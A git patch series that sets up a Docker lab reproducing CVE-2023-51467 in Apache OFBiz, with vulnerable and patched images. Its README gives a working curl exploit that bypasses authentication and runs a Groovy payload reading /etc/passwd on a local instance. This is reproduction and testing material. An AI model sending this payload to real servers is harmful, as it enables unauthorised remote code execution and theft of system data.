From d6460e00ac397c97c935a29d4a2809466bcc624a Mon Sep 17 00:00:00 2001
From: W0ngL1 <148697527+W0ngL1@users.noreply.github.com>
Date: Fri, 12 Sep 2025 14:55:13 +0800
Subject: [PATCH 1/3] Create README.md

---
 apache/ofbiz/CVE-2023-51467/README.md | 31 +++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 apache/ofbiz/CVE-2023-51467/README.md

diff --git a/apache/ofbiz/CVE-2023-51467/README.md b/apache/ofbiz/CVE-2023-51467/README.md
new file mode 100644
index 00000000..4bd1db45
--- /dev/null
+++ b/apache/ofbiz/CVE-2023-51467/README.md
@@ -0,0 +1,31 @@
+# Reproduction Guide
+
+## Vulnerable Version
+### Step 1 – Start the Lab Environment
+Start all required containers with Docker Compose using `docker-compose.yml`:
+
+```bash
+docker-compose -f docker-compose.yml up -d
+```
+
+### Step 2 – Verify the Vulnerability
+Issue the following HTTP request to the local instance:
+```bash
+curl "https://localhost:8443/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y" -d "groovyProgram=throw+new+Exception('cat /etc/passwd'.execute().text);" -k -v
+```
+The response body should contains `root:x:`.
+
+## Not Vulnerable Version
+### Step 1 – Start the Lab Environment
+Start all required containers with Docker Compose using `docker-compose-secure.yml`:
+
+```bash
+docker-compose -f docker-compose-secure.yml up -d
+```
+
+### Step 2 – Verify the Vulnerability
+Issue the following HTTP request to the local instance:
+```bash
+curl "https://localhost:8443/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y" -d "groovyProgram=throw+new+Exception('cat /etc/passwd'.execute().text);" -k -v
+```
+The response body should NOT contains `root:x:`.

From 53b60841b829357a125428aadc1a9262d8cde40e Mon Sep 17 00:00:00 2001
From: W0ngL1 <148697527+W0ngL1@users.noreply.github.com>
Date: Fri, 12 Sep 2025 14:55:35 +0800
Subject: [PATCH 2/3] Create docker-compose.yml

---
 apache/ofbiz/CVE-2023-51467/docker-compose.yml | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100644 apache/ofbiz/CVE-2023-51467/docker-compose.yml

diff --git a/apache/ofbiz/CVE-2023-51467/docker-compose.yml b/apache/ofbiz/CVE-2023-51467/docker-compose.yml
new file mode 100644
index 00000000..bf9ac38d
--- /dev/null
+++ b/apache/ofbiz/CVE-2023-51467/docker-compose.yml
@@ -0,0 +1,6 @@
+services:
+ web:
+   image: vulhub/ofbiz:18.12.10
+   ports:
+    - "8443:8443"
+    - "5005:5005"

From 9402c41e2628735669d4f0601427d2692fddafc7 Mon Sep 17 00:00:00 2001
From: W0ngL1 <148697527+W0ngL1@users.noreply.github.com>
Date: Fri, 12 Sep 2025 14:57:16 +0800
Subject: [PATCH 3/3] Create docker-compose-secure.yml

---
 apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100644 apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml

diff --git a/apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml b/apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml
new file mode 100644
index 00000000..2098d79f
--- /dev/null
+++ b/apache/ofbiz/CVE-2023-51467/docker-compose-secure.yml
@@ -0,0 +1,6 @@
+services:
+ web:
+   image: vulhub/ofbiz:18.12.14
+   ports:
+    - "8443:8443"
+    - "5005:5005"